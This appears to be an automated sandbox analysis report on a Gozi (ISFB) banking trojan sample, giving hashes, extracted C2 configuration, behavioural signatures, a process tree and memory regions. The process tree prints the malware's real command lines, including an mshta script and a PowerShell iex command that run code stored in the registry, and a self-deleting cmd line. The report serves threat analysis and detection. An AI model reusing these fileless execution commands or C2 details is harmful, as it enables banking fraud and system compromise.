Overview

overview

10

Static

static

3

dridex

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230915-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
  • submitted
    06-10-2023 13:11

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    713061a3f104a116e82686dcc3d7c28e6bac0ea519a166c43a65b2f10cd0bdcf.exe

  • Size

    292KB

  • MD5

    f63d00d962c43095a6de3838401e5b59

  • SHA1

    c49feab758326a965d30fef2807291cf39c0d61a

  • SHA256

    713061a3f104a116e82686dcc3d7c28e6bac0ea519a166c43a65b2f10cd0bdcf

  • SHA512

    12f2fa8d97edcc5e045d222bc0b74521767f13bc18d190a965b14095367e73fb24cd387e354f345675954f47fdd9e174ff8e257b32e7aaa04cd22b1b17cbd9d7

  • SSDEEP

    3072:/girqLkRXUklcl8F0W6IbV418GM7cCtHEaV0AtdQa9l0Ck5jU:/gY9RJ2l8Nrdb3Q8l0Zj

Score
10/10
gozi5050bankerisfbtrojan

Malware Config

Extracted

Family

gozi

Extracted

Family

gozi

Botnet

5050

C2

mifrutty.com

Attributes
  • base_path

    /jerry/

  • build

    250260

  • exe_type

    loader

  • extension

    .bob

  • server_id

    50

rsa_pubkey.plain
aes.plain

Extracted

Family

gozi

Botnet

5050

C2

mifrutty.com

systemcheck.top
Attributes
  • base_path

    /pictures/

  • build

    250260

  • exe_type

    worker

  • extension

    .bob

  • server_id

    50

rsa_pubkey.plain
aes.plain

Signatures

  • Gozi

    Gozi is a well-known and widely distributed banking trojan.

    bankertrojangozi
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Suspicious use of SetThreadContext 8 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Modifies registry class 64 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 11 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 46 IoCs

Processes

  • C:\Windows\System32\RuntimeBroker.exe
    C:\Windows\System32\RuntimeBroker.exe -Embedding
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:3716
  • C:\Windows\System32\RuntimeBroker.exe
    C:\Windows\System32\RuntimeBroker.exe -Embedding
    1⤵
    • Modifies registry class
    PID:2872
  • C:\Windows\System32\RuntimeBroker.exe
    C:\Windows\System32\RuntimeBroker.exe -Embedding
    1⤵
      PID:2528
    • C:\Windows\System32\RuntimeBroker.exe
      C:\Windows\System32\RuntimeBroker.exe -Embedding
      1⤵
        PID:4012
      • C:\Windows\Explorer.EXE
        C:\Windows\Explorer.EXE
        1⤵
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: GetForegroundWindowSpam
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of UnmapMainImage
        • Suspicious use of WriteProcessMemory
        PID:3144
        • C:\Users\Admin\AppData\Local\Temp\713061a3f104a116e82686dcc3d7c28e6bac0ea519a166c43a65b2f10cd0bdcf.exe
          "C:\Users\Admin\AppData\Local\Temp\713061a3f104a116e82686dcc3d7c28e6bac0ea519a166c43a65b2f10cd0bdcf.exe"
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:3792
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 3792 -s 472
            3⤵
            • Program crash
            PID:4368
        • C:\Windows\System32\mshta.exe
          "C:\Windows\System32\mshta.exe" "about:<hta:application><script>Buc2='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Buc2).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\47C55FEA-FA41-11E9-3C6B-CED530CFE2D9\\\ActiveStart'));if(!window.flag)close()</script>"
          2⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:4192
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name dixqup -value gp; new-alias -name hviarr -value iex; hviarr ([System.Text.Encoding]::ASCII.GetString((dixqup "HKCU:Software\AppDataLow\Software\Microsoft\47C55FEA-FA41-11E9-3C6B-CED530CFE2D9").ClassFile))
            3⤵
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2312
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
              "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\o1uv0yxb\o1uv0yxb.cmdline"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:3276
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3B7D.tmp" "c:\Users\Admin\AppData\Local\Temp\o1uv0yxb\CSCB75900AD7DB14239B85AE5C502ADAE5.TMP"
                5⤵
                  PID:2020
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\dxjmaq45\dxjmaq45.cmdline"
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:5036
                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3C77.tmp" "c:\Users\Admin\AppData\Local\Temp\dxjmaq45\CSCC91879A4AB584A628291D713F81B7B1A.TMP"
                  5⤵
                    PID:4388
            • C:\Windows\syswow64\cmd.exe
              "C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
              2⤵
                PID:3060
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\713061a3f104a116e82686dcc3d7c28e6bac0ea519a166c43a65b2f10cd0bdcf.exe"
                2⤵
                • Suspicious use of SetThreadContext
                • Suspicious behavior: MapViewOfSection
                • Suspicious use of WriteProcessMemory
                PID:2284
                • C:\Windows\system32\PING.EXE
                  ping localhost -n 5
                  3⤵
                  • Runs ping.exe
                  • Suspicious behavior: CmdExeWriteProcessMemorySpam
                  PID:3136
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 3792 -ip 3792
              1⤵
                PID:3632

              Network

              MITRE ATT&CK Enterprise v15

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Users\Admin\AppData\Local\Temp\RES3B7D.tmp
                Filesize

                1KB

                MD5

                bff101374572d2d77be75b52e9f90ab4

                SHA1

                1c1711c0e24ade8a25211e97440fd47dbb70fbfb

                SHA256

                efe5c084df460924f8011cda000214203e3d20f870cda73e4403542f17291e1f

                SHA512

                00b929e3ea71a83e64b0a29ec01e9c335298ce9aa9188d346a001d71590ea17864506b41f3766684a6a63035fc267604c6e41be29c3142ea77945620c1a8d59c

                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\RES3C77.tmp
                Filesize

                1KB

                MD5

                0427dafcd3fa8bbb0df7d113941141ab

                SHA1

                049d038ccfaca9c4400d60fbd23921917ffc64da

                SHA256

                253dd4ee7b7e59ae10cc3a1b14e8775e9da7894b1b04bdd9ffd6fbcfad2912e4

                SHA512

                24e49755825129545688e41c1d1b9761ccda2bc2da12a222292e3f0fb27f8a0febee6d54fc50fa47ab9633216a062d08ffa43e4632a3d32753ca510856b690fc

                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zptakf4z.uvj.ps1
                Filesize

                60B

                MD5

                d17fe0a3f47be24a6453e9ef58c94641

                SHA1

                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                SHA256

                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                SHA512

                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\dxjmaq45\dxjmaq45.dll
                Filesize

                3KB

                MD5

                241faa82c459bf776fd44d325c3691d0

                SHA1

                1380305843f051fa530a6e66726e886c5c7cca78

                SHA256

                8ed59eedaa98d05147a821e78354d7751837ec6a91b474304f080292baef2490

                SHA512

                1ce0d31de5accabce55e1aa9d4c17e60045f425e16023e0c9ef1d9fb3bbf6ebbbbe571c30dd82de0ee756da065ed1d55c9c31f0f5ed2bb4fdb193c065bc4513f

                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\o1uv0yxb\o1uv0yxb.dll
                Filesize

                3KB

                MD5

                f2c3f827a9dc3179c45f88f4f1088c1b

                SHA1

                b1691ced4404541956a5ea497dc00c99cc087285

                SHA256

                4d5764a33adf113ef68ffa0de15d3648916ad6b0ef796bf3f89914269bd93ada

                SHA512

                1d73cf72c69b6009a1a75371d1f6f55745941005db5806bb615eaa067397861c10d5c2c5eb7c026b64422b6d83386fe327b454cf9ff017905843c95fac39c161

                Download Submit

              • \??\c:\Users\Admin\AppData\Local\Temp\dxjmaq45\CSCC91879A4AB584A628291D713F81B7B1A.TMP
                Filesize

                652B

                MD5

                96cf666ee645d93e960eecf187470547

                SHA1

                71e30c3dadf2c02456083f2861958fc45ee1adb2

                SHA256

                be2de2e98649ff1a43f8532c68053bec2d476a5142282a3fe7ea254ecc09eeb5

                SHA512

                61941f5e382551ff9472c4c401896a9818987cd282ce5d4865c1166e978641ef0ace8701274b2308837ad36ed5500747d8c604f30a9011611b11c0c43a99141d

                Download Submit

              • \??\c:\Users\Admin\AppData\Local\Temp\dxjmaq45\dxjmaq45.0.cs
                Filesize

                406B

                MD5

                ca8887eacd573690830f71efaf282712

                SHA1

                0acd4f49fc8cf6372950792402ec3aeb68569ef8

                SHA256

                568b0c1155379c88e91f904f4e70a3608fbf664ef890309cd705a7c5eb3232c3

                SHA512

                2a538a308db6c7d09224737f549d442b4c206e8e9605a2570149243ee11bf0c5f028ebf003b383f86709d0dd976ff66d15ccb700f50969ff3da64dd39cab25c7

                Download Submit

              • \??\c:\Users\Admin\AppData\Local\Temp\dxjmaq45\dxjmaq45.cmdline
                Filesize

                369B

                MD5

                f640dbd14a3c9874c42631614c97075e

                SHA1

                7dd4e1df53b55ea929ed548d33abeea07d4857c3

                SHA256

                f8650be58d09a8a3d65619f760e801e769f6a6219237ecf911deab561cb80685

                SHA512

                a1bf702ea9db70c0d46630bd0e6fa16bcd1deda4f8d85979e43346a2d9a5b8fd046036708962f09d4e805a7b5f212bb0a7af9b51ef9fc4af5c1f12d7707ada4f

                Download Submit

              • \??\c:\Users\Admin\AppData\Local\Temp\o1uv0yxb\CSCB75900AD7DB14239B85AE5C502ADAE5.TMP
                Filesize

                652B

                MD5

                cd957fbea2175e3d7751d99c75385d90

                SHA1

                df61563bea3605aa52ea7873fcdf39f89a213692

                SHA256

                80c546c37210849b5228b2a39bd9067e4fe820f4cb70e2a46fb4104f4e497487

                SHA512

                c19554dfe3b439e32b2bc90a575f442b8c6da94d5efb40884a189519cdb5b68af26e0c08025395714c89856ccc79b66fb42cd6381fa831aaa91afd46aa9e2770

                Download Submit

              • \??\c:\Users\Admin\AppData\Local\Temp\o1uv0yxb\o1uv0yxb.0.cs
                Filesize

                405B

                MD5

                caed0b2e2cebaecd1db50994e0c15272

                SHA1

                5dfac9382598e0ad2e700de4f833de155c9c65fa

                SHA256

                21210b9baafb8b03ab0ef625312973a77bb5aba856c91892b65826e8b7c3b150

                SHA512

                86dc4f8cedd37464c9c492c467375d4603715e5827dfaf7bfcfe5c46ce5e09b439139d4b0a756afa37e4c2444c5b169ac1c024217b9ba449edb183a3b53f2b62

                Download Submit

              • \??\c:\Users\Admin\AppData\Local\Temp\o1uv0yxb\o1uv0yxb.cmdline
                Filesize

                369B

                MD5

                41c73a2b216faad365978c64fe3249ea

                SHA1

                cfa9dafa036079ab44f3fcd468ee5d0916e19629

                SHA256

                171e218e3e4285366c9040786f9920e5147e5ef0c8bea115db5c3f603351017a

                SHA512

                3846a71ac9ee7e66ca9883b9c9e072f68fcab85d3bf8b65040f80ef2e4a9e29e60b90553d06a2683e1a589749dc01285aefc3779524c28d1454e50a53fa53829

                Download Submit

              • memory/2284-99-0x000001D679970000-0x000001D679971000-memory.dmp

                Filesize

                4KB

                Download

              • memory/2284-98-0x000001D679AB0000-0x000001D679B54000-memory.dmp

                Filesize

                656KB

                Download

              • memory/2284-121-0x000001D679AB0000-0x000001D679B54000-memory.dmp

                Filesize

                656KB

                Download

              • memory/2312-55-0x000002A95A140000-0x000002A95A17D000-memory.dmp

                Filesize

                244KB

                Download

              • memory/2312-26-0x000002A959D10000-0x000002A959D20000-memory.dmp

                Filesize

                64KB

                Download

              • memory/2312-39-0x000002A95A110000-0x000002A95A118000-memory.dmp

                Filesize

                32KB

                Download

              • memory/2312-25-0x000002A959D10000-0x000002A959D20000-memory.dmp

                Filesize

                64KB

                Download

              • memory/2312-24-0x000002A959D10000-0x000002A959D20000-memory.dmp

                Filesize

                64KB

                Download

              • memory/2312-23-0x00007FFAEAEF0000-0x00007FFAEB9B1000-memory.dmp

                Filesize

                10.8MB

                Download

              • memory/2312-13-0x000002A959D90000-0x000002A959DB2000-memory.dmp

                Filesize

                136KB

                Download

              • memory/2312-68-0x00007FFAEAEF0000-0x00007FFAEB9B1000-memory.dmp

                Filesize

                10.8MB

                Download

              • memory/2312-53-0x000002A95A130000-0x000002A95A138000-memory.dmp

                Filesize

                32KB

                Download

              • memory/2312-70-0x000002A95A140000-0x000002A95A17D000-memory.dmp

                Filesize

                244KB

                Download

              • memory/2528-86-0x000001F41A1D0000-0x000001F41A1D1000-memory.dmp

                Filesize

                4KB

                Download

              • memory/2528-119-0x000001F41A920000-0x000001F41A9C4000-memory.dmp

                Filesize

                656KB

                Download

              • memory/2528-83-0x000001F41A920000-0x000001F41A9C4000-memory.dmp

                Filesize

                656KB

                Download

              • memory/2872-91-0x000001EB83770000-0x000001EB83771000-memory.dmp

                Filesize

                4KB

                Download

              • memory/2872-90-0x000001EB836C0000-0x000001EB83764000-memory.dmp

                Filesize

                656KB

                Download

              • memory/2872-122-0x000001EB836C0000-0x000001EB83764000-memory.dmp

                Filesize

                656KB

                Download

              • memory/3060-107-0x0000000000B10000-0x0000000000BA8000-memory.dmp

                Filesize

                608KB

                Download

              • memory/3060-100-0x0000000000B10000-0x0000000000BA8000-memory.dmp

                Filesize

                608KB

                Download

              • memory/3060-103-0x0000000000BB0000-0x0000000000BB1000-memory.dmp

                Filesize

                4KB

                Download

              • memory/3136-120-0x0000019FEA3D0000-0x0000019FEA474000-memory.dmp

                Filesize

                656KB

                Download

              • memory/3136-112-0x0000019FEA3D0000-0x0000019FEA474000-memory.dmp

                Filesize

                656KB

                Download

              • memory/3136-111-0x0000019FEA260000-0x0000019FEA261000-memory.dmp

                Filesize

                4KB

                Download

              • memory/3144-58-0x00000000022B0000-0x00000000022B1000-memory.dmp

                Filesize

                4KB

                Download

              • memory/3144-117-0x00000000089E0000-0x0000000008A84000-memory.dmp

                Filesize

                656KB

                Download

              • memory/3144-57-0x00000000089E0000-0x0000000008A84000-memory.dmp

                Filesize

                656KB

                Download

              • memory/3716-71-0x0000020844000000-0x00000208440A4000-memory.dmp

                Filesize

                656KB

                Download

              • memory/3716-79-0x0000020843AE0000-0x0000020843AE1000-memory.dmp

                Filesize

                4KB

                Download

              • memory/3716-81-0x0000020844000000-0x00000208440A4000-memory.dmp

                Filesize

                656KB

                Download

              • memory/3792-3-0x0000000002310000-0x000000000231B000-memory.dmp

                Filesize

                44KB

                Download

              • memory/3792-1-0x0000000002490000-0x0000000002590000-memory.dmp

                Filesize

                1024KB

                Download

              • memory/3792-4-0x0000000002450000-0x000000000245D000-memory.dmp

                Filesize

                52KB

                Download

              • memory/3792-7-0x0000000000400000-0x000000000228F000-memory.dmp

                Filesize

                30.6MB

                Download

              • memory/3792-2-0x0000000000400000-0x000000000228F000-memory.dmp

                Filesize

                30.6MB

                Download

              • memory/3792-8-0x0000000002490000-0x0000000002590000-memory.dmp

                Filesize

                1024KB

                Download

              • memory/4012-76-0x00000232F8FD0000-0x00000232F9074000-memory.dmp

                Filesize

                656KB

                Download

              • memory/4012-118-0x00000232F8FD0000-0x00000232F9074000-memory.dmp

                Filesize

                656KB

                Download

              • memory/4012-84-0x00000232F8F90000-0x00000232F8F91000-memory.dmp

                Filesize

                4KB

                Download